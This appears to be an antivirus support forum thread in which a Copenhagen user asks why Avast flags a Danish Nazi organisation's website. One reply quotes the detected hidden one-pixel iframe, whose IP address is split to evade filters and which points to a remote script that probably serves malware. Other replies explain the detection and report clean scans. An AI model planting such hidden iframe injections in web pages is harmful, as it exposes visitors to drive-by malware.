avast "block" political organisation !

???

Hey ! I read this on DNSB site:

http://www [.] dnsb[.] info/ - removeto go to the link

WARNING : It is a NAZI Page !!!

1:
That avast warn people to visit the page.

(Well - that´s sort of OK - Because it is Nazi organisation in Denmark - Small and without influence -
Thanks to that! - But it is legal, and I think it is OK, as we have democracy and freedom of speech in Denmark)

2: It tell that avast in pre-installed on many new computers !
In the article. Look for yourself - there is a picture.
Unfortunate it is in Danish language !

Well - I do remember avast warned the first time - But I ignored it, and now there is no warning.

WOT do also warn by a RED circle !

IS there danger for malware/spyware ?

YES - It is junk/foolish/danger hate speech !!!

Greetings from tjunk in Copenhagen, Denmark

But is there any danger to the computer

  • Beside the brain :wink:

Greetings From tjunk in Copenhagen, Denmark

The site appears to be clean, according to the virustotal analysis. http://www.virustotal.com/url-scan/report.html?id=a9532eed695b7401fb9bf6df4269105f-1298185014

Many thanks Tarq57 - Nice to know it is a clean site, talking about spy-ware and mall-ware

Hello,
there is detection for this iframe: ifr’+‘ame src="hXXp://173.246.1’+'03.5/s.php" height=“1” width=“1”
and this detection is correct.

???
Lucky that avast got it !

May I ask : Do you know what these “thing” do, Sirmer ?

I mean, if avast did not take care of it …

The payload at the other end of the iframe, could change regularly and probably does. What avast is detecting is the insertion of the iframe and that fact that it most likely going to a malicious site.

They also go to the trouble of obfuscating the IP address trying to hide where it is pointing.

::slight_smile:
Thanks to all for your answers

I have scanned with avast Free 5.1.889 and Malwarebytes`and Super-Anti-Spy-ware.

There seams to be no problems …

It is not a site I agree on. But I like to know for my-selves that goes on. Besides that I have my own opinion,who are much different from the site I was asking about